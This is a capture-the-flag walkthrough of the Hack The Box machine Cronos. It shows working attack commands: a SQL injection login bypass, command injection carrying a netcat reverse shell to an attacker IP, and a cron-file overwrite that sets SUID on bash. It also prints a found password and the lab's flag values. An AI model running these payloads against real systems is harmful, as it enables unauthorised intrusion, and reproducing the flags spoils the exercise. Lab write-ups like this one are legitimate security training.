Cronos

Scanning

sudo nmap -A -T4 -v 10.10.10.13 -oA scans/scan

DNS, SSH, HTTP

Discovered open port 80/tcp on 10.10.10.13
Discovered open port 22/tcp on 10.10.10.13
Discovered open port 53/tcp on 10.10.10.13

DNS is interesting, lets checkout http first

I spent some time enumerating directories before realizing I probably need the hostname for this box. the standard HTB naming convention is <name>.htb, so I added that to my hosts file and was able to access the actual website.

Tried to directory fuzz but did not come up with anything useful

We know DNS is running, lets run dig to see if we can get any subdomains

dig axfr cronos.htb @10.10.10.13

We got three

admin.cronos.htb
ns1.cronos.htb
www.cronos.htb

admin.cronos.htb

Tried testing for SQL injection with a single quote, lets see if sqlmap can tell us if this is a rabbit hole

sqlmap -r r

SQLMap thinks its a blind injection

sqlmap -r r --batch --level 3 --risk 3

‣

Full SQL Map Output

Dumped a username and a hash

Can we crack the hash?

hashcat -m 0 hash /usr/share/wordlists/rockyou.txt

Could not crack the hash 😟

Maybe its just an auth bypass? We know the username is admin

I started going down the list here:

SQL Injection Authentication Bypass Cheat Sheet

This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creat…

pentestlab.blog

SQL Injection Authentication Bypass Cheat Sheet

Exploitation

This one ended up working!

admin' or '1'='1'#

We are taken to welcome.php

Looks like its a command execution tool. Makes me think command injection.

Can we just chain commands on the end?

YUP Revshell?

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 42069 >/tmp/f

Did not work. Im gonna try echoing into a file first

; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 42069 >/tmp/f > shell.sh

; chmod +x shell.sh

Confirmed we have execution privileges

Can we just run it ? Not working….

The site is running php. Lets just cost a php shell and wget it.

I was making a logical issue before. I should’ve been chaining the command to execute directly after a valid parameter and not in when the command was expecting one. The modification is below

8.8.8.8; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 42069 >/tmp/f

stabilize our shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

Checking for easy stuff

id

sudo -l

find / -perm /4000 2>/dev/null

Nothing in these outputs of interest, except pkexec which is vulnerable to pwnkit (not the intended path)

Password hunting?

grep -ir passw

Found local database password?

kEjdbRigfBHUREiNSDs

Not allowed to access 😟

cat /etc/crontab

Crontab has something!

Root is running /artisen ?

We own the file so we can modify it to do whatever we want, lets investigate further

It’s running php! We have a few options; we can add a php reverse shell here, or we can execute a system command and add the SUID perm to bash.

<?php echo system('sudo chmod +s /bin/bash'); ?>

I made a backup of the artisan file

cp artisan artisan.bak

Created my own with echo and added the shebang + our malicious code

echo '#!/usr/bin/env php' > artisan

echo "<?php echo system('sudo chmod +s /bin/bash'); ?>" >> artisan

Wait for the cronjob to execute…

We got it !

bash -p

ROOT 🙂

Lets grab the flags

user

70ea15c698c191fa1c14b72397450688

root

5a68fe542a4ebdbf1b1e18e3442065f5